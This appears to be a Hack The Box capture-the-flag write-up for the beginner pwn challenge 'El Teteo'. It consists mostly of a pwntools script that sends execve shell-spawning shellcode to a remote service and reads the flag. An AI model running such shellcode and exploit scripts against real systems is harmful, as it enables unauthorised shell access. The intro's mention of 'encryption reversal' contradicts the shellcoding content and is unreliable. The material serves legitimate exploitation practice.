HackTheBox El Teteo Writeup
Explore the basics of cybersecurity in the El Teteo Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
Proof of Concept (PoC)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/usr/bin/python3
from pwn import *
import warnings
import os
warnings.filterwarnings('ignore')
context.arch = 'amd64'
def get_process():
try:
host, port = sys.argv[1].split(':')
return remote(host, int(port))
except IndexError:
print(f'Usage: python {sys.argv[0]} <ip:port>')
exit(1)
r = get_process()
sc = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
r.sendlineafter('>', sc)
sleep(1)
r.sendline('cat flag*')
print(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()}')
r.close()
Summary
El Teteo on Hack The Box is a beginner-friendly pwn challenge showcasing shellcoding and binary exploitation. With NX disabled, the program executes custom shellcode injected into a buffer, allowing users to gain a shell and retrieve the flag. This straightforward challenge is ideal for learning basic shellcoding and exploitation techniques.
This post is licensed under CC BY 4.0 by the author.